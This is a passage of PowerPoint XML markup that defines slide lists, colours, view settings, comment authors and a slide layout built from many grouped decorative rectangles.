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1457" r:id="rId2"/>
    <p:sldId id="1394" r:id="rId3"/>
    <p:sldId id="1486" r:id="rId4"/>
    <p:sldId id="1487" r:id="rId5"/>
    <p:sldId id="1493" r:id="rId6"/>
  </p:sldIdLst>
  <p:sldSz cx="12192000" cy="68580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06">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" pos="3807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yz" initials="x" lastIdx="1" clrIdx="0"/>
  <p:cmAuthor id="2" name="秦 莫天" initials="秦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EFEFEF"/>
    <a:srgbClr val="A5A5A5"/>
    <a:srgbClr val="003366"/>
    <a:srgbClr val="3399FF"/>
    <a:srgbClr val="FF9900"/>
    <a:srgbClr val="5F5F5F"/>
    <a:srgbClr val="FFCC00"/>
    <a:srgbClr val="6666FF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7" autoAdjust="0"/>
    <p:restoredTop sz="86026" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="74" d="100"/>
          <a:sy n="74" d="100"/>
        </p:scale>
        <p:origin x="1042" y="67"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2006"/>
        <p:guide pos="3807"/>
      </p:guideLst>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:outlineViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="33" d="100"/>
        <a:sy n="33" d="100"/>
      </p:scale>
      <p:origin x="0" y="321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14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6885" y="720725"/>
            <a:ext cx="640143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9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59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9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fld id="{7A1ED033-5F5C-4572-AE4B-7CFF71C657D2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bg bwMode="gray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图片 112" descr="掌控者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83835" y="1240790"/>
            <a:ext cx="1740535" cy="621665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 102"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12193201" cy="306863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5" name="AutoShape 103"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="3759570" y="3113088"/>
            <a:ext cx="7823970" cy="838200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6" name="Rectangle 105"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="10262610" y="1741488"/>
            <a:ext cx="711270" cy="838200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FFFFFF">
                <a:alpha val="50195"/>
              </a:srgb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7" name="Rectangle 106"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="9246510" y="1131888"/>
            <a:ext cx="1219320" cy="838200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FFFFFF">
                <a:alpha val="50195"/>
              </a:srgb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8" name="Rectangle 107"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="10770660" y="141288"/>
            <a:ext cx="1219320" cy="1524000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FFFFFF">
                <a:alpha val="50195"/>
              </a:srgb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9" name="Rectangle 108"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="8738460" y="750888"/>
            <a:ext cx="711270" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FFFFFF">
                <a:alpha val="50195"/>
              </a:srgb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10" name="Rectangle 110"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="8433630" y="2884488"/>
            <a:ext cx="711270" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FFFFFF">
                <a:alpha val="50195"/>
              </a:srgb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11" name="Rectangle 114"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="5080500" y="2655888"/>
            <a:ext cx="203220" cy="152400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12" name="Rectangle 120"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="5690160" y="2655888"/>
            <a:ext cx="203220" cy="152400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13" name="Rectangle 124"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="5994990" y="2655888"/>
            <a:ext cx="203220" cy="152400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14" name="Rectangle 126"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="6299820" y="2655888"/>
            <a:ext cx="203220" cy="152400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ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="Group 211"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="6299820" y="1741488"/>
            <a:ext cx="1727370" cy="838200"/>
            <a:chOff x="2976" y="1440"/>
            <a:chExt cx="816" cy="528"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Rectangle 104"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3120" y="1440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7" name="Rectangle 125"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2976" y="1728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8" name="Rectangle 127"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3120" y="1584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9" name="Rectangle 128"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3120" y="1728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20" name="Rectangle 129"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3120" y="1872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21" name="Rectangle 130"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3264" y="1584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22" name="Rectangle 131"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3264" y="1872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23" name="Rectangle 132"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3408" y="1440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24" name="Rectangle 133"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3408" y="1584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25" name="Rectangle 134"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3408" y="1728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26" name="Rectangle 135"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3408" y="1872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27" name="Rectangle 136"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3552" y="1440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28" name="Rectangle 137"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3552" y="1728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29" name="Rectangle 138"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3696" y="1584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30" name="Rectangle 139"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3696" y="1728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31" name="Rectangle 140"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3696" y="1872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</p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="32" name="Group 212"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4470840" y="1970088"/>
            <a:ext cx="1727370" cy="609600"/>
            <a:chOff x="2112" y="1584"/>
            <a:chExt cx="816" cy="384"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="Rectangle 112"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2400" y="1584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34" name="Rectangle 113"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2400" y="1872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35" name="Rectangle 115"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2544" y="1584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36" name="Rectangle 116"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2544" y="1728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37" name="Rectangle 117"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2544" y="1872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38" name="Rectangle 118"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2688" y="1584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39" name="Rectangle 119"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2688" y="1872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40" name="Rectangle 121"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2832" y="1584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41" name="Rectangle 122"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2832" y="1728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42" name="Rectangle 123"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2832" y="1872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43" name="Rectangle 141"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2256" y="1872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44" name="Rectangle 142"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2112" y="1872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</p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="45" name="Group 143"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1016100" y="3570288"/>
            <a:ext cx="2540250" cy="762000"/>
            <a:chOff x="2112" y="1632"/>
            <a:chExt cx="1680" cy="672"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="Rectangle 144"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2400" y="1776"/>
              <a:ext cx="95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47" name="Rectangle 145"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2400" y="2065"/>
              <a:ext cx="95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48" name="Rectangle 146"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2400" y="2207"/>
              <a:ext cx="95" cy="97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49" name="Rectangle 147"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2545" y="1776"/>
              <a:ext cx="95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50" name="Rectangle 148"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2545" y="1920"/>
              <a:ext cx="95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51" name="Rectangle 149"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2545" y="2065"/>
              <a:ext cx="95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52" name="Rectangle 150"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2687" y="1776"/>
              <a:ext cx="97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53" name="Rectangle 151"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2687" y="2065"/>
              <a:ext cx="97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54" name="Rectangle 152"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2687" y="2207"/>
              <a:ext cx="97" cy="97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55" name="Rectangle 153"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2832" y="1776"/>
              <a:ext cx="98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56" name="Rectangle 154"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2832" y="1920"/>
              <a:ext cx="98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57" name="Rectangle 155"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2832" y="2065"/>
              <a:ext cx="98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58" name="Rectangle 156"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2832" y="2207"/>
              <a:ext cx="98" cy="97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59" name="Rectangle 157"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2976" y="1920"/>
              <a:ext cx="97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60" name="Rectangle 158"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2976" y="2207"/>
              <a:ext cx="97" cy="97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61" name="Rectangle 159"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3120" y="1776"/>
              <a:ext cx="97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62" name="Rectangle 160"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3120" y="1920"/>
              <a:ext cx="97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63" name="Rectangle 161"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3120" y="2065"/>
              <a:ext cx="97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64" name="Rectangle 162"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3264" y="1776"/>
              <a:ext cx="95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65" name="Rectangle 163"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3264" y="2065"/>
              <a:ext cx="95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66" name="Rectangle 164"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3408" y="1632"/>
              <a:ext cx="95" cy="97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67" name="Rectangle 165"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3408" y="1776"/>
              <a:ext cx="95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68" name="Rectangle 166"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3408" y="1920"/>
              <a:ext cx="95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69" name="Rectangle 167"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3408" y="2065"/>
              <a:ext cx="95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70" name="Rectangle 168"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3553" y="1632"/>
              <a:ext cx="95" cy="97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71" name="Rectangle 169"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3553" y="1920"/>
              <a:ext cx="95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72" name="Rectangle 170"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3695" y="1776"/>
              <a:ext cx="97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73" name="Rectangle 171"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3695" y="1920"/>
              <a:ext cx="97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74" name="Rectangle 172"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3695" y="2065"/>
              <a:ext cx="97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75" name="Rectangle 173"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2256" y="2065"/>
              <a:ext cx="95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76" name="Rectangle 174"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2112" y="2065"/>
              <a:ext cx="97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</p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="77" name="Group 175"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="7315920" y="827088"/>
            <a:ext cx="3556350" cy="1066800"/>
            <a:chOff x="2112" y="1632"/>
            <a:chExt cx="1680" cy="672"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="78" name="Rectangle 176"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2400" y="1776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79" name="Rectangle 177"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2400" y="2064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80" name="Rectangle 178"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2400" y="2208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81" name="Rectangle 179"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2544" y="1776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82" name="Rectangle 180"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2544" y="1920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83" name="Rectangle 181"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2544" y="2064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84" name="Rectangle 182"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2688" y="1776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85" name="Rectangle 183"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2688" y="2064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86" name="Rectangle 184"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2688" y="2208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87" name="Rectangle 185"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2832" y="1776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88" name="Rectangle 186"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2832" y="1920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89" name="Rectangle 187"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2832" y="2064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90" name="Rectangle 188"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2832" y="2208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91" name="Rectangle 189"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2976" y="1920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92" name="Rectangle 190"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2976" y="2208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93" name="Rectangle 191"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3120" y="1776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94" name="Rectangle 192"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3120" y="1920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95" name="Rectangle 193"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
